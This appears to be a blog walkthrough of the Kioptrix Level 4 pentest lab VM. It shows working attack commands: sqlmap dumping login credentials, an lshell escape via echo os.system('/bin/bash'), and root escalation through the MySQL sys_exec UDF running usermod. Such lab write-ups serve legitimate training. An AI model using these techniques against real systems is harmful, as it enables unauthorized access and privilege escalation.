Core dump overflow

Core dump in progress...

Pentest lab - Kioptrix Level 4

| Comments

This is the final vulnerable machine in the Kioptrix series. To set it up in VMware, create a new virtual machine with the advanced options and use existing virtual disk, pointing it at the Kioptrix 4 virtual disk.

Let’s see what Nmap reveals:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

nmap -A -p1-65535 192.168.127.129

Starting Nmap 6.46 ( http://nmap.org ) at 2014-06-22 22:35 EEST
Nmap scan report for 192.168.127.129
Host is up (0.00074s latency).
Not shown: 39528 closed ports, 26003 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:1F:12:65 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2014-06-22T18:36:57-04:00
| smb-security-mode: 
|   Account that was used for smb scripts: guest
|   User-level authentication
|   SMB Security: Challenge/response passwords supported
|_  Message signing disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol

Again, this seems to be a web based challenge. Navigating to the target website shows this:

login

Supplying a single quote in the password field gives an error, which nicely discloses the database end as being MySQL:

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/checklogin.php on line 28 Wrong Username or Password

Sqlmap to the rescue!

1
2
3
4
5
6
7
8
9
10
11

sqlmap -u "http://192.168.127.129/checklogin.php" --dbms=MySQL --level=5 --risk=3 --data="myusername=admin&mypassword=test" --dump

Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

Logging in with these credentials didn’t yield anything though, all I could see was a member’s control panel with no functionality. So I remembered the previous challenge that allowed SSH access, and tried to log in:

1
2
3
4
5
6
7
8
9
10
11

root@kali:~# ssh john@192.168.127.129
The authenticity of host '192.168.127.129 (192.168.127.129)' can't be established.
RSA key fingerprint is 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.127.129' (RSA) to the list of known hosts.
john@192.168.127.129's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$

Excellent! It’s time for some sniffing around. This is not a normal shell, usual commands don’t work, so let’s see what’s available with the help system.

1
2

john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

Hmm, not much. Actions are restricted too, can’t cd to wherever I want:

1
2
3
4

john:~$ cd /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.

So I googled for a bit, and it appears this shell is a Python based limited shell (https://github.com/ghantoos/lshell):

lshell is a shell coded in Python, that lets you restrict a user’s environment to limited sets of commands, choose to enable/ disable any command over SSH (e.g. SCP, SFTP, rsync, etc.), log user’s commands, implement timing restriction, and more.

It is possible to escape from this shell by leveraging the echo command to call os.system in order to spawn a shell: echo os.system(‘/bin/bash’)

1
2
3

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)

Poking around, I found the following information in /var/www/john/john.php:

1
2
3

$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password

So, root doesn’t have a password for MySQL? Let’s check:

1
2
3
4
5
6

john@Kioptrix4:/var/www/john$ mysql -u root -h localhost 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

Here I have found a way to get root privileges from a MySQL server running as root. Here’s a quick summary:

  • It is possible to escalate from MySQL server root level to system root by using User Defined Functions (UDF)

  • We need the lib_mysqludf_sys.so library that contains some useful functions that can interact with the OS. The most important ones are sys_exec (executes the command and returns the exit status) and sys_eval (executes the command and returns the standard output)

The next step would be to find a way to get the library on the machine with our MySQL server. But that’s not necessary in this case, because it’s already on the server!

1
2

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so

It took a bit of googling and trial and error until I found a way that worked in getting me to a root shell. Here is a useful post. The relevant part for us is this:

Until Ubuntu 11.10, the Unix group for administrators with root privileges through sudo had been admin. Starting with Ubuntu 12.04 LTS, it is now sudo, for compatibility with Debian and sudo itself. However, for backwards compatibility, admin group members are still recognized as administrators

So it is possible to make the john account to be part of the admin group, that is equivalent to the sudo group. So from the MySQL prompt, run this:

1

SELECT sys_exec('usermod -a -G admin');

What that does is it modifies john’s account, appending it to the admin group. So let’s do it on the MySQL command line:

1
2
3
4
5
6
7

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.11 sec)

Now from john’s shell:

1
2
3
4

john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# whoami
root

Awesome! We finally got root access! In root’s directory there is another congrats.txt file that tells us there are at least 2 different tested ways to get root on this system. It sure was an interesting machine, and my favorite in the series, because it wasn’t as straightforward as the others, and I had to look for more information and try (and fail) different approaches before I hit upon the winning one.

Here’s today’s fortune cookie:

You single-handedly fought your way into this hopeless mess.

Comments